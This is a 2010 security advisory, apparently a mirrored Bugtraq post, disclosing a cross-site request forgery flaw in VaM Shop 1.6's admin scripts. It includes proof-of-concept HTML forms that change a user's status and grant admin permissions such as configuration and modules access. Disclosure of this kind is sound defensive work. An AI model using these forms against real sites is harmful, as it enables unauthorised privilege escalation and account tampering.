XSRF (CSRF) in VaM Shop

From: advisory@htbridge.ch
To: bugtraq@securityfocus.com
Subject: XSRF (CSRF) in VaM Shop

Vulnerability ID: HTB22780
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_vam_shop.html
Product: VaM Shop
Vendor: Vamsoft ( http://vamshop.ru/ ) 
Vulnerable Version: 1.6 and Probably Prior Versions
Vendor Notification: 28 December 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "admin/accounting.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available. Change user status:

<form action="http://host/admin/customers.php?page=1&cID=USERID&action=statusconfirm" method="post" name="main">
<input type="hidden" name="status" value="0">

Change user permissions:

<form action="http://host/admin/accounting.php?cID=USERID&action=save" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="access[]" value="configuration">
<input type="hidden" name="access[]" value="modules">
<input type="hidden" name="access[]" value="customers">
<input type="hidden" name="access[]" value="start">
<input type="hidden" name="access[]" value="content_manager">
<input type="hidden" name="access[]" value="categories">

Copyright © 1995-2020 LinuxRocket.net. All rights reserved.